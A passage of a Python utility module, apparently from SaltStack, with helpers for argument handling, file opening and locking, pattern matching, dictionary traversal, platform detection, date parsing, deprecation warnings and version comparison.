return list(lexer)
regex = r''
for line in text.splitlines():
parts = [re.escape(s) for s in __build_parts(line)]
regex += r'(?:[\s]+)?{0}(?:[\s]+)?'.format(r'(?:[\s]+)?'.join(parts))
return r'(?m)^{0}$'.format(regex)
def format_call(fun,
data,
initial_ret=None,
expected_extra_kws=()):
'''
Build the required arguments and keyword arguments required for the passed
function.
:param fun: The function to get the argspec from
:param data: A dictionary containing the required data to build the
arguments and keyword arguments.
:param initial_ret: The initial return data pre-populated as dictionary or
None
:param expected_extra_kws: Any expected extra keyword argument names which
should not trigger a :ref:`SaltInvocationError`
:returns: A dictionary with the function required arguments and keyword
arguments.
'''
ret = initial_ret is not None and initial_ret or {}
ret['args'] = []
ret['kwargs'] = {}
aspec = salt.utils.args.get_function_argspec(fun)
arg_data = arg_lookup(fun)
args = arg_data['args']
kwargs = arg_data['kwargs']
# Since we WILL be changing the data dictionary, let's change a copy of it
data = data.copy()
missing_args = []
for key in kwargs:
try:
kwargs[key] = data.pop(key)
except KeyError:
# Let's leave the default value in place
pass
while args:
arg = args.pop(0)
try:
ret['args'].append(data.pop(arg))
except KeyError:
missing_args.append(arg)
if missing_args:
used_args_count = len(ret['args']) + len(args)
args_count = used_args_count + len(missing_args)
raise SaltInvocationError(
'{0} takes at least {1} argument{2} ({3} given)'.format(
fun.__name__,
args_count,
args_count > 1 and 's' or '',
used_args_count
)
)
ret['kwargs'].update(kwargs)
if aspec.keywords:
# The function accepts **kwargs, any non expected extra keyword
# arguments will made available.
for key, value in six.iteritems(data):
if key in expected_extra_kws:
continue
ret['kwargs'][key] = value
# No need to check for extra keyword arguments since they are all
# **kwargs now. Return
return ret
# Did not return yet? Lets gather any remaining and unexpected keyword
# arguments
extra = {}
for key, value in six.iteritems(data):
if key in expected_extra_kws:
continue
extra[key] = copy.deepcopy(value)
# We'll be showing errors to the users until Salt Carbon comes out, after
# which, errors will be raised instead.
warn_until(
'Carbon',
'It\'s time to start raising `SaltInvocationError` instead of '
'returning warnings',
# Let's not show the deprecation warning on the console, there's no
# need.
_dont_call_warnings=True
)
if extra:
# Found unexpected keyword arguments, raise an error to the user
if len(extra) == 1:
msg = '\'{0[0]}\' is an invalid keyword argument for \'{1}\''.format(
list(extra.keys()),
ret.get(
# In case this is being called for a state module
'full',
# Not a state module, build the name
'{0}.{1}'.format(fun.__module__, fun.__name__)
)
)
else:
msg = '{0} and \'{1}\' are invalid keyword arguments for \'{2}\''.format(
', '.join(['\'{0}\''.format(e) for e in extra][:-1]),
list(extra.keys())[-1],
ret.get(
# In case this is being called for a state module
'full',
# Not a state module, build the name
'{0}.{1}'.format(fun.__module__, fun.__name__)
)
)
# Return a warning to the user explaining what's going on
ret.setdefault('warnings', []).append(
'{0}. If you were trying to pass additional data to be used '
'in a template context, please populate \'context\' with '
'\'key: value\' pairs. Your approach will work until Salt '
'Carbon is out.{1}'.format(
msg,
'' if 'full' not in ret else ' Please update your state files.'
)
)
# Lets pack the current extra kwargs as template context
ret.setdefault('context', {}).update(extra)
return ret
def arg_lookup(fun):
'''
Return a dict containing the arguments and default arguments to the
function.
'''
ret = {'kwargs': {}}
aspec = salt.utils.args.get_function_argspec(fun)
if aspec.defaults:
ret['kwargs'] = dict(zip(aspec.args[::-1], aspec.defaults[::-1]))
ret['args'] = [arg for arg in aspec.args if arg not in ret['kwargs']]
return ret
def istextfile(fp_, blocksize=512):
'''
Uses heuristics to guess whether the given file is text or binary,
by reading a single block of bytes from the file.
If more than 30% of the chars in the block are non-text, or there
are NUL ('\x00') bytes in the block, assume this is a binary file.
'''
int2byte = (lambda x: bytes((x,))) if six.PY3 else chr
text_characters = (
b''.join(int2byte(i) for i in range(32, 127)) +
b'\n\r\t\f\b')
try:
block = fp_.read(blocksize)
except AttributeError:
# This wasn't an open filehandle, so treat it as a file path and try to
# open the file
try:
with fopen(fp_, 'rb') as fp2_:
block = fp2_.read(blocksize)
except IOError:
# Unable to open file, bail out and return false
return False
if b'\x00' in block:
# Files with null bytes are binary
return False
elif not block:
# An empty file is considered a valid text file
return True
try:
block.decode('utf-8')
return True
except UnicodeDecodeError:
pass
nontext = block.translate(None, text_characters)
return float(len(nontext)) / len(block) <= 0.30
def isorted(to_sort):
'''
Sort a list of strings ignoring case.
>>> L = ['foo', 'Foo', 'bar', 'Bar']
>>> sorted(L)
['Bar', 'Foo', 'bar', 'foo']
>>> sorted(L, key=lambda x: x.lower())
['bar', 'Bar', 'foo', 'Foo']
>>>
'''
return sorted(to_sort, key=lambda x: x.lower())
def mysql_to_dict(data, key):
'''
Convert MySQL-style output to a python dictionary
'''
ret = {}
headers = ['']
for line in data:
if not line:
continue
if line.startswith('+'):
continue
comps = line.split('|')
for comp in range(len(comps)):
comps[comp] = comps[comp].strip()
if len(headers) > 1:
index = len(headers) - 1
row = {}
for field in range(index):
if field < 1:
continue
else:
row[headers[field]] = str_to_num(comps[field])
ret[row[key]] = row
else:
headers = comps
return ret
def contains_whitespace(text):
'''
Returns True if there are any whitespace characters in the string
'''
return any(x.isspace() for x in text)
def str_to_num(text):
'''
Convert a string to a number.
Returns an integer if the string represents an integer, a floating
point number if the string is a real number, or the string unchanged
otherwise.
'''
try:
return int(text)
except ValueError:
try:
return float(text)
except ValueError:
return text
def fopen(*args, **kwargs):
'''
Wrapper around open() built-in to set CLOEXEC on the fd.
This flag specifies that the file descriptor should be closed when an exec
function is invoked;
When a file descriptor is allocated (as with open or dup), this bit is
initially cleared on the new file descriptor, meaning that descriptor will
survive into the new program after exec.
NB! We still have small race condition between open and fcntl.
'''
# ensure 'binary' mode is always used on windows
if kwargs.pop('binary', True):
if is_windows():
if len(args) > 1:
args = list(args)
if 'b' not in args[1]:
args[1] += 'b'
elif kwargs.get('mode', None):
if 'b' not in kwargs['mode']:
kwargs['mode'] += 'b'
else:
# the default is to read
kwargs['mode'] = 'rb'
fhandle = open(*args, **kwargs)
if is_fcntl_available():
# modify the file descriptor on systems with fcntl
# unix and unix-like systems only
try:
FD_CLOEXEC = fcntl.FD_CLOEXEC # pylint: disable=C0103
except AttributeError:
FD_CLOEXEC = 1 # pylint: disable=C0103
old_flags = fcntl.fcntl(fhandle.fileno(), fcntl.F_GETFD)
fcntl.fcntl(fhandle.fileno(), fcntl.F_SETFD, old_flags | FD_CLOEXEC)
return fhandle
@contextlib.contextmanager
def flopen(*args, **kwargs):
'''
Shortcut for fopen with lock and context manager
'''
with fopen(*args, **kwargs) as fhandle:
try:
if is_fcntl_available(check_sunos=True):
fcntl.flock(fhandle.fileno(), fcntl.LOCK_SH)
yield fhandle
finally:
if is_fcntl_available(check_sunos=True):
fcntl.flock(fhandle.fileno(), fcntl.LOCK_UN)
@contextlib.contextmanager
def fpopen(*args, **kwargs):
'''
Shortcut for fopen with extra uid, gid and mode options.
Supported optional Keyword Arguments:
mode: explicit mode to set. Mode is anything os.chmod
would accept as input for mode. Works only on unix/unix
like systems.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the path is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the path is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
# Remove uid, gid and mode from kwargs if present
uid = kwargs.pop('uid', -1) # -1 means no change to current uid
gid = kwargs.pop('gid', -1) # -1 means no change to current gid
mode = kwargs.pop('mode', None)
with fopen(*args, **kwargs) as fhandle:
path = args[0]
d_stat = os.stat(path)
if hasattr(os, 'chown'):
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(path, uid, gid)
if mode is not None:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode:
os.chmod(path, (d_stat.st_mode ^ mode_part) | mode)
yield fhandle
def expr_match(line, expr):
'''
Evaluate a line of text against an expression. First try a full-string
match, next try globbing, and then try to match assuming expr is a regular
expression. Originally designed to match minion IDs for
whitelists/blacklists.
'''
if line == expr:
return True
if fnmatch.fnmatch(line, expr):
return True
try:
if re.match(r'\A{0}\Z'.format(expr), line):
return True
except re.error:
pass
return False
def check_whitelist_blacklist(value, whitelist=None, blacklist=None):
'''
Check a whitelist and/or blacklist to see if the value matches it.
'''
if not any((whitelist, blacklist)):
return True
in_whitelist = False
in_blacklist = False
if whitelist:
if not isinstance(whitelist, list):
whitelist = [whitelist]
try:
for expr in whitelist:
if expr_match(value, expr):
in_whitelist = True
break
except TypeError:
log.error('Non-iterable whitelist {0}'.format(whitelist))
whitelist = None
else:
whitelist = None
if blacklist:
if not isinstance(blacklist, list):
blacklist = [blacklist]
try:
for expr in blacklist:
if expr_match(value, expr):
in_blacklist = True
break
except TypeError:
log.error('Non-iterable blacklist {0}'.format(whitelist))
blacklist = None
else:
blacklist = None
if whitelist and not blacklist:
ret = in_whitelist
elif blacklist and not whitelist:
ret = not in_blacklist
elif whitelist and blacklist:
ret = in_whitelist and not in_blacklist
else:
ret = True
return ret
def subdict_match(data,
expr,
delimiter=DEFAULT_TARGET_DELIM,
regex_match=False,
exact_match=False):
'''
Check for a match in a dictionary using a delimiter character to denote
levels of subdicts, and also allowing the delimiter character to be
matched. Thus, 'foo:bar:baz' will match data['foo'] == 'bar:baz' and
data['foo']['bar'] == 'baz'. The former would take priority over the
latter.
'''
def _match(target, pattern, regex_match=False, exact_match=False):
if regex_match:
try:
return re.match(pattern.lower(), str(target).lower())
except Exception:
log.error('Invalid regex \'{0}\' in match'.format(pattern))
return False
elif exact_match:
return str(target).lower() == pattern.lower()
else:
return fnmatch.fnmatch(str(target).lower(), pattern.lower())
def _dict_match(target, pattern, regex_match=False, exact_match=False):
wildcard = pattern.startswith('*:')
if wildcard:
pattern = pattern[2:]
if pattern == '*':
# We are just checking that the key exists
return True
elif pattern in target:
# We might want to search for a key
return True
elif subdict_match(target,
pattern,
regex_match=regex_match,
exact_match=exact_match):
return True
if wildcard:
for key in target.keys():
if _match(key,
pattern,
regex_match=regex_match,
exact_match=exact_match):
return True
if isinstance(target[key], dict):
if _dict_match(target[key],
pattern,
regex_match=regex_match,
exact_match=exact_match):
return True
elif isinstance(target[key], list):
for item in target[key]:
if _match(item,
pattern,
regex_match=regex_match,
exact_match=exact_match):
return True
return False
for idx in range(1, expr.count(delimiter) + 1):
splits = expr.split(delimiter)
key = delimiter.join(splits[:idx])
matchstr = delimiter.join(splits[idx:])
log.debug('Attempting to match \'{0}\' in \'{1}\' using delimiter '
'\'{2}\''.format(matchstr, key, delimiter))
match = traverse_dict_and_list(data, key, {}, delimiter=delimiter)
if match == {}:
continue
if isinstance(match, dict):
if _dict_match(match,
matchstr,
regex_match=regex_match,
exact_match=exact_match):
return True
continue
if isinstance(match, list):
# We are matching a single component to a single list member
for member in match:
if isinstance(member, dict):
if _dict_match(member,
matchstr,
regex_match=regex_match,
exact_match=exact_match):
return True
if _match(member,
matchstr,
regex_match=regex_match,
exact_match=exact_match):
return True
continue
if _match(match,
matchstr,
regex_match=regex_match,
exact_match=exact_match):
return True
return False
def traverse_dict(data, key, default, delimiter=DEFAULT_TARGET_DELIM):
'''
Traverse a dict using a colon-delimited (or otherwise delimited, using the
'delimiter' param) target string. The target 'foo:bar:baz' will return
data['foo']['bar']['baz'] if this value exists, and will otherwise return
the dict in the default argument.
'''
try:
for each in key.split(delimiter):
data = data[each]
except (KeyError, IndexError, TypeError):
# Encountered a non-indexable value in the middle of traversing
return default
return data
def traverse_dict_and_list(data, key, default, delimiter=DEFAULT_TARGET_DELIM):
'''
Traverse a dict or list using a colon-delimited (or otherwise delimited,
using the 'delimiter' param) target string. The target 'foo:bar:0' will
return data['foo']['bar'][0] if this value exists, and will otherwise
return the dict in the default argument.
Function will automatically determine the target type.
The target 'foo:bar:0' will return data['foo']['bar'][0] if data like
{'foo':{'bar':['baz']}} , if data like {'foo':{'bar':{'0':'baz'}}}
then return data['foo']['bar']['0']
'''
for each in key.split(delimiter):
if isinstance(data, list):
try:
idx = int(each)
except ValueError:
embed_match = False
# Index was not numeric, lets look at any embedded dicts
for embedded in (x for x in data if isinstance(x, dict)):
try:
data = embedded[each]
embed_match = True
break
except KeyError:
pass
if not embed_match:
# No embedded dicts matched, return the default
return default
else:
try:
data = data[idx]
except IndexError:
return default
else:
try:
data = data[each]
except (KeyError, TypeError):
return default
return data
def mkstemp(*args, **kwargs):
'''
Helper function which does exactly what `tempfile.mkstemp()` does but
accepts another argument, `close_fd`, which, by default, is true and closes
the fd before returning the file path. Something commonly done throughout
Salt's code.
'''
close_fd = kwargs.pop('close_fd', True)
fd_, fpath = tempfile.mkstemp(*args, **kwargs)
if close_fd is False:
return (fd_, fpath)
os.close(fd_)
del fd_
return fpath
def clean_kwargs(**kwargs):
'''
Return a dict without any of the __pub* keys (or any other keys starting
with a dunder) from the kwargs dict passed into the execution module
functions. These keys are useful for tracking what was used to invoke
the function call, but they may not be desierable to have if passing the
kwargs forward wholesale.
'''
ret = {}
for key, val in six.iteritems(kwargs):
if not key.startswith('__'):
ret[key] = val
return ret
@real_memoize
def is_windows():
'''
Simple function to return if a host is Windows or not
'''
return sys.platform.startswith('win')
def sanitize_win_path_string(winpath):
'''
Remove illegal path characters for windows
'''
intab = '<>:|?*'
outtab = '_' * len(intab)
trantab = ''.maketrans(intab, outtab) if six.PY3 else string.maketrans(intab, outtab)
if isinstance(winpath, str):
winpath = winpath.translate(trantab)
elif isinstance(winpath, six.text_type):
winpath = winpath.translate(dict((ord(c), u'_') for c in intab))
return winpath
@real_memoize
def is_proxy():
'''
Return True if this minion is a proxy minion.
Leverages the fact that is_linux() and is_windows
both return False for proxies.
TODO: Need to extend this for proxies that might run on
other Unices
'''
import __main__ as main
# This is a hack. If a proxy minion is started by other
# means, e.g. a custom script that creates the minion objects
# then this will fail.
is_proxy = False
try:
if 'salt-proxy' in main.__file__:
is_proxy = True
except AttributeError:
pass
return is_proxy
@real_memoize
def is_linux():
'''
Simple function to return if a host is Linux or not.
Note for a proxy minion, we need to return something else
'''
return sys.platform.startswith('linux')
@real_memoize
def is_darwin():
'''
Simple function to return if a host is Darwin (OS X) or not
'''
return sys.platform.startswith('darwin')
@real_memoize
def is_sunos():
'''
Simple function to return if host is SunOS or not
'''
return sys.platform.startswith('sunos')
@real_memoize
def is_smartos():
'''
Simple function to return if host is SmartOS (Illumos) or not
'''
if not is_sunos():
return False
else:
return os.uname()[3].startswith('joyent_')
@real_memoize
def is_smartos_globalzone():
'''
Function to return if host is SmartOS (Illumos) global zone or not
'''
if not is_smartos():
return False
else:
cmd = ['zonename']
try:
zonename = subprocess.Popen(
cmd, shell=False,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
except OSError:
return False
if zonename.returncode:
return False
if zonename.stdout.read().strip() == 'global':
return True
return False
@real_memoize
def is_smartos_zone():
'''
Function to return if host is SmartOS (Illumos) and not the gz
'''
if not is_smartos():
return False
else:
cmd = ['zonename']
try:
zonename = subprocess.Popen(
cmd, shell=False,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
except OSError:
return False
if zonename.returncode:
return False
if zonename.stdout.read().strip() == 'global':
return False
return True
@real_memoize
def is_freebsd():
'''
Simple function to return if host is FreeBSD or not
'''
return sys.platform.startswith('freebsd')
@real_memoize
def is_openbsd():
'''
Simple function to return if host is OpenBSD or not
'''
return sys.platform.startswith('openbsd')
def is_fcntl_available(check_sunos=False):
'''
Simple function to check if the `fcntl` module is available or not.
If `check_sunos` is passed as `True` an additional check to see if host is
SunOS is also made. For additional information see: http://goo.gl/159FF8
'''
if check_sunos and is_sunos():
return False
return HAS_FCNTL
def check_include_exclude(path_str, include_pat=None, exclude_pat=None):
'''
Check for glob or regexp patterns for include_pat and exclude_pat in the
'path_str' string and return True/False conditions as follows.
- Default: return 'True' if no include_pat or exclude_pat patterns are
supplied
- If only include_pat or exclude_pat is supplied: return 'True' if string
passes the include_pat test or fails exclude_pat test respectively
- If both include_pat and exclude_pat are supplied: return 'True' if
include_pat matches AND exclude_pat does not match
'''
ret = True # -- default true
# Before pattern match, check if it is regexp (E@'') or glob(default)
if include_pat:
if re.match('E@', include_pat):
retchk_include = True if re.search(
include_pat[2:],
path_str
) else False
else:
retchk_include = True if fnmatch.fnmatch(
path_str,
include_pat
) else False
if exclude_pat:
if re.match('E@', exclude_pat):
retchk_exclude = False if re.search(
exclude_pat[2:],
path_str
) else True
else:
retchk_exclude = False if fnmatch.fnmatch(
path_str,
exclude_pat
) else True
# Now apply include/exclude conditions
if include_pat and not exclude_pat:
ret = retchk_include
elif exclude_pat and not include_pat:
ret = retchk_exclude
elif include_pat and exclude_pat:
ret = retchk_include and retchk_exclude
else:
ret = True
return ret
def gen_state_tag(low):
'''
Generate the running dict tag string from the low data structure
'''
return '{0[state]}_|-{0[__id__]}_|-{0[name]}_|-{0[fun]}'.format(low)
def check_state_result(running, recurse=False):
'''
Check the total return value of the run and determine if the running
dict has any issues
'''
if not isinstance(running, dict):
return False
if not running:
return False
ret = True
for state_result in six.itervalues(running):
if not recurse and not isinstance(state_result, dict):
ret = False
if ret and isinstance(state_result, dict):
result = state_result.get('result', _empty)
if result is False:
ret = False
# only override return value if we are not already failed
elif result is _empty and isinstance(state_result, dict) and ret:
ret = check_state_result(state_result, recurse=True)
# return as soon as we got a failure
if not ret:
break
return ret
def test_mode(**kwargs):
'''
Examines the kwargs passed and returns True if any kwarg which matching
"Test" in any variation on capitalization (i.e. "TEST", "Test", "TeSt",
etc) contains a True value (as determined by salt.utils.is_true).
'''
for arg, value in six.iteritems(kwargs):
try:
if arg.lower() == 'test' and is_true(value):
return True
except AttributeError:
continue
return False
def is_true(value=None):
'''
Returns a boolean value representing the "truth" of the value passed. The
rules for what is a "True" value are:
1. Integer/float values greater than 0
2. The string values "True" and "true"
3. Any object for which bool(obj) returns True
'''
# First, try int/float conversion
try:
value = int(value)
except (ValueError, TypeError):
pass
try:
value = float(value)
except (ValueError, TypeError):
pass
# Now check for truthiness
if isinstance(value, (int, float)):
return value > 0
elif isinstance(value, six.string_types):
return str(value).lower() == 'true'
else:
return bool(value)
def exactly_n(l, n=1):
'''
Tests that exactly N items in an iterable are "truthy" (neither None,
False, nor 0).
'''
i = iter(l)
return all(any(i) for j in range(n)) and not any(i)
def exactly_one(l):
'''
Check if only one item is not None, False, or 0 in an iterable.
'''
return exactly_n(l)
def rm_rf(path):
'''
Platform-independent recursive delete. Includes code from
http://stackoverflow.com/a/2656405
'''
def _onerror(func, path, exc_info):
'''
Error handler for `shutil.rmtree`.
If the error is due to an access error (read only file)
it attempts to add write permission and then retries.
If the error is for another reason it re-raises the error.
Usage : `shutil.rmtree(path, onerror=onerror)`
'''
if is_windows() and not os.access(path, os.W_OK):
# Is the error an access error ?
os.chmod(path, stat.S_IWUSR)
func(path)
else:
raise # pylint: disable=E0704
shutil.rmtree(path, onerror=_onerror)
def option(value, default='', opts=None, pillar=None):
'''
Pass in a generic option and receive the value that will be assigned
'''
if opts is None:
opts = {}
if pillar is None:
pillar = {}
sources = (
(opts, value),
(pillar, 'master:{0}'.format(value)),
(pillar, value),
)
for source, val in sources:
out = traverse_dict_and_list(source, val, default)
if out is not default:
return out
return default
def parse_docstring(docstring):
'''
Parse a docstring into its parts.
Currently only parses dependencies, can be extended to parse whatever is
needed.
Parses into a dictionary:
{
'full': full docstring,
'deps': list of dependencies (empty list if none)
}
'''
# First try with regex search for :depends:
ret = {}
ret['full'] = docstring
regex = r'([ \t]*):depends:[ \t]+- (\w+)[^\n]*\n(\1[ \t]+- (\w+)[^\n]*\n)*'
match = re.search(regex, docstring, re.M)
if match:
deps = []
regex = r'- (\w+)'
for line in match.group(0).strip().splitlines():
deps.append(re.search(regex, line).group(1))
ret['deps'] = deps
return ret
# Try searching for a one-liner instead
else:
txt = 'Required python modules: '
data = docstring.splitlines()
dep_list = list(x for x in data if x.strip().startswith(txt))
if not dep_list:
ret['deps'] = []
return ret
deps = dep_list[0].replace(txt, '').strip().split(', ')
ret['deps'] = deps
return ret
def print_cli(msg):
'''
Wrapper around print() that suppresses tracebacks on broken pipes (i.e.
when salt output is piped to less and less is stopped prematurely).
'''
try:
try:
print(msg)
except UnicodeEncodeError:
print(msg.encode('utf-8'))
except IOError as exc:
if exc.errno != errno.EPIPE:
raise
def safe_walk(top, topdown=True, onerror=None, followlinks=True, _seen=None):
'''
A clone of the python os.walk function with some checks for recursive
symlinks. Unlike os.walk this follows symlinks by default.
'''
islink, join, isdir = os.path.islink, os.path.join, os.path.isdir
if _seen is None:
_seen = set()
# We may not have read permission for top, in which case we can't
# get a list of the files the directory contains. os.path.walk
# always suppressed the exception then, rather than blow up for a
# minor reason when (say) a thousand readable directories are still
# left to visit. That logic is copied here.
try:
# Note that listdir and error are globals in this module due
# to earlier import-*.
names = os.listdir(top)
except os.error as err:
if onerror is not None:
onerror(err)
return
if followlinks:
status = os.stat(top)
# st_ino is always 0 on some filesystems (FAT, NTFS); ignore them
if status.st_ino != 0:
node = (status.st_dev, status.st_ino)
if node in _seen:
return
_seen.add(node)
dirs, nondirs = [], []
for name in names:
full_path = join(top, name)
if isdir(full_path):
dirs.append(name)
else:
nondirs.append(name)
if topdown:
yield top, dirs, nondirs
for name in dirs:
new_path = join(top, name)
if followlinks or not islink(new_path):
for x in safe_walk(new_path, topdown, onerror, followlinks, _seen):
yield x
if not topdown:
yield top, dirs, nondirs
def get_hash(path, form='sha256', chunk_size=65536):
'''
Get the hash sum of a file
This is better than ``get_sum`` for the following reasons:
- It does not read the entire file into memory.
- It does not return a string on error. The returned value of
``get_sum`` cannot really be trusted since it is vulnerable to
collisions: ``get_sum(..., 'xyz') == 'Hash xyz not supported'``
'''
hash_type = hasattr(hashlib, form) and getattr(hashlib, form) or None
if hash_type is None:
raise ValueError('Invalid hash type: {0}'.format(form))
with salt.utils.fopen(path, 'rb') as ifile:
hash_obj = hash_type()
# read the file in in chunks, not the entire file
for chunk in iter(lambda: ifile.read(chunk_size), b''):
hash_obj.update(chunk)
return hash_obj.hexdigest()
def namespaced_function(function, global_dict, defaults=None):
'''
Redefine (clone) a function under a different globals() namespace scope
'''
if defaults is None:
defaults = function.__defaults__
new_namespaced_function = types.FunctionType(
function.__code__,
global_dict,
name=function.__name__,
argdefs=defaults
)
new_namespaced_function.__dict__.update(function.__dict__)
return new_namespaced_function
def alias_function(fun, name, doc=None):
'''
Copy a function
'''
alias_fun = types.FunctionType(fun.__code__,
fun.__globals__,
name,
fun.__defaults__,
fun.__closure__)
alias_fun.__dict__.update(fun.__dict__)
if doc and isinstance(doc, six.string_types):
alias_fun.__doc__ = doc
else:
orig_name = fun.__name__
alias_msg = ('\nThis function is an alias of '
'``{0}``.\n'.format(orig_name))
alias_fun.__doc__ = alias_msg + fun.__doc__
return alias_fun
def _win_console_event_handler(event):
if event == 5:
# Do nothing on CTRL_LOGOFF_EVENT
return True
return False
def enable_ctrl_logoff_handler():
if HAS_WIN32API:
win32api.SetConsoleCtrlHandler(_win_console_event_handler, 1)
def date_cast(date):
'''
Casts any object into a datetime.datetime object
date
any datetime, time string representation...
'''
if date is None:
return datetime.datetime.now()
elif isinstance(date, datetime.datetime):
return date
# fuzzy date
try:
if isinstance(date, six.string_types):
try:
if HAS_TIMELIB:
# py3: yes, timelib.strtodatetime wants bytes, not str :/
return timelib.strtodatetime(to_bytes(date))
except ValueError:
pass
# not parsed yet, obviously a timestamp?
if date.isdigit():
date = int(date)
else:
date = float(date)
return datetime.datetime.fromtimestamp(date)
except Exception:
if HAS_TIMELIB:
raise ValueError('Unable to parse {0}'.format(date))
raise RuntimeError('Unable to parse {0}.'
' Consider installing timelib'.format(date))
def date_format(date=None, format="%Y-%m-%d"):
'''
Converts date into a time-based string
date
any datetime, time string representation...
format
:ref:`strftime<http://docs.python.org/2/library/datetime.html#datetime.datetime.strftime>` format
>>> import datetime
>>> src = datetime.datetime(2002, 12, 25, 12, 00, 00, 00)
>>> date_format(src)
'2002-12-25'
>>> src = '2002/12/25'
>>> date_format(src)
'2002-12-25'
>>> src = 1040814000
>>> date_format(src)
'2002-12-25'
>>> src = '1040814000'
>>> date_format(src)
'2002-12-25'
'''
return date_cast(date).strftime(format)
def warn_until(version,
message,
category=DeprecationWarning,
stacklevel=None,
_version_info_=None,
_dont_call_warnings=False):
'''
Helper function to raise a warning, by default, a ``DeprecationWarning``,
until the provided ``version``, after which, a ``RuntimeError`` will
be raised to remind the developers to remove the warning because the
target version has been reached.
:param version: The version info or name after which the warning becomes a
``RuntimeError``. For example ``(0, 17)`` or ``Hydrogen``
or an instance of :class:`salt.version.SaltStackVersion`.
:param message: The warning message to be displayed.
:param category: The warning class to be thrown, by default
``DeprecationWarning``
:param stacklevel: There should be no need to set the value of
``stacklevel``. Salt should be able to do the right thing.
:param _version_info_: In order to reuse this function for other SaltStack
projects, they need to be able to provide the
version info to compare to.
:param _dont_call_warnings: This parameter is used just to get the
functionality until the actual error is to be
issued. When we're only after the salt version
checks to raise a ``RuntimeError``.
'''
if not isinstance(version, (tuple,
six.string_types,
salt.version.SaltStackVersion)):
raise RuntimeError(
'The \'version\' argument should be passed as a tuple, string or '
'an instance of \'salt.version.SaltStackVersion\'.'
)
elif isinstance(version, tuple):
version = salt.version.SaltStackVersion(*version)
elif isinstance(version, six.string_types):
version = salt.version.SaltStackVersion.from_name(version)
if stacklevel is None:
# Attribute the warning to the calling function, not to warn_until()
stacklevel = 2
if _version_info_ is None:
_version_info_ = salt.version.__version_info__
_version_ = salt.version.SaltStackVersion(*_version_info_)
if _version_ >= version:
import inspect
caller = inspect.getframeinfo(sys._getframe(stacklevel - 1))
raise RuntimeError(
'The warning triggered on filename \'{filename}\', line number '
'{lineno}, is supposed to be shown until version '
'{until_version} is released. Current version is now '
'{salt_version}. Please remove the warning.'.format(
filename=caller.filename,
lineno=caller.lineno,
until_version=version.formatted_version,
salt_version=_version_.formatted_version
),
)
if _dont_call_warnings is False:
def _formatwarning(message,
category,
filename,
lineno,
line=None): # pylint: disable=W0613
'''
Replacement for warnings.formatwarning that disables the echoing of
the 'line' parameter.
'''
return '{0}:{1}: {2}: {3}\n'.format(
filename, lineno, category.__name__, message
)
saved = warnings.formatwarning
warnings.formatwarning = _formatwarning
warnings.warn(
message.format(version=version.formatted_version),
category,
stacklevel=stacklevel
)
warnings.formatwarning = saved
def kwargs_warn_until(kwargs,
version,
category=DeprecationWarning,
stacklevel=None,
_version_info_=None,
_dont_call_warnings=False):
'''
Helper function to raise a warning (by default, a ``DeprecationWarning``)
when unhandled keyword arguments are passed to function, until the
provided ``version_info``, after which, a ``RuntimeError`` will be raised
to remind the developers to remove the ``**kwargs`` because the target
version has been reached.
This function is used to help deprecate unused legacy ``**kwargs`` that
were added to function parameters lists to preserve backwards compatibility
when removing a parameter. See
:doc:`the deprecation development docs </topics/development/deprecations>`
for the modern strategy for deprecating a function parameter.
:param kwargs: The caller's ``**kwargs`` argument value (a ``dict``).
:param version: The version info or name after which the warning becomes a
``RuntimeError``. For example ``(0, 17)`` or ``Hydrogen``
or an instance of :class:`salt.version.SaltStackVersion`.
:param category: The warning class to be thrown, by default
``DeprecationWarning``
:param stacklevel: There should be no need to set the value of
``stacklevel``. Salt should be able to do the right thing.
:param _version_info_: In order to reuse this function for other SaltStack
projects, they need to be able to provide the
version info to compare to.
:param _dont_call_warnings: This parameter is used just to get the
functionality until the actual error is to be
issued. When we're only after the salt version
checks to raise a ``RuntimeError``.
'''
if not isinstance(version, (tuple,
six.string_types,
salt.version.SaltStackVersion)):
raise RuntimeError(
'The \'version\' argument should be passed as a tuple, string or '
'an instance of \'salt.version.SaltStackVersion\'.'
)
elif isinstance(version, tuple):
version = salt.version.SaltStackVersion(*version)
elif isinstance(version, six.string_types):
version = salt.version.SaltStackVersion.from_name(version)
if stacklevel is None:
# Attribute the warning to the calling function,
# not to kwargs_warn_until() or warn_until()
stacklevel = 3
if _version_info_ is None:
_version_info_ = salt.version.__version_info__
_version_ = salt.version.SaltStackVersion(*_version_info_)
if kwargs or _version_.info >= version.info:
arg_names = ', '.join('\'{0}\''.format(key) for key in kwargs)
warn_until(
version,
message='The following parameter(s) have been deprecated and '
'will be removed in \'{0}\': {1}.'.format(version.string,
arg_names),
category=category,
stacklevel=stacklevel,
_version_info_=_version_.info,
_dont_call_warnings=_dont_call_warnings
)
def version_cmp(pkg1, pkg2, ignore_epoch=False):
'''
Compares two version strings using distutils.version.LooseVersion. This is
a fallback for providers which don't have a version comparison utility
built into them. Return -1 if version1 < version2, 0 if version1 ==
version2, and 1 if version1 > version2. Return None if there was a problem
making the comparison.
'''
normalize = lambda x: str(x).split(':', 1)[-1] if ignore_epoch else str(x)
pkg1 = normalize(pkg1)
pkg2 = normalize(pkg2)
try:
# pylint: disable=no-member
if distutils.version.LooseVersion(pkg1) < \
distutils.version.LooseVersion(pkg2):
return -1
elif distutils.version.LooseVersion(pkg1) == \
distutils.version.LooseVersion(pkg2):
return 0
elif distutils.version.LooseVersion(pkg1) > \
distutils.version.LooseVersion(pkg2):
return 1
except Exception as exc:
log.exception(exc)
return None
def compare_versions(ver1='',
oper='==',
ver2='',
cmp_func=None,
ignore_epoch=False):
'''
Compares two version numbers. Accepts a custom function to perform the
cmp-style version comparison, otherwise uses version_cmp().
'''
cmp_map = {'<': (-1,), '<=': (-1, 0), '==': (0,),
'>=': (0, 1), '>': (1,)}
if oper not in ('!=',) and oper not in cmp_map:
log.error('Invalid operator \'%s\' for version comparison', oper)
return False
if cmp_func is None:
cmp_func = version_cmp
cmp_result = cmp_func(ver1, ver2, ignore_epoch=ignore_epoch)
if cmp_result is None:
return False
# Check if integer/long
if not isinstance(cmp_result, numbers.Integral):
log.error('The version comparison function did not return an '
'integer/long.')
return False
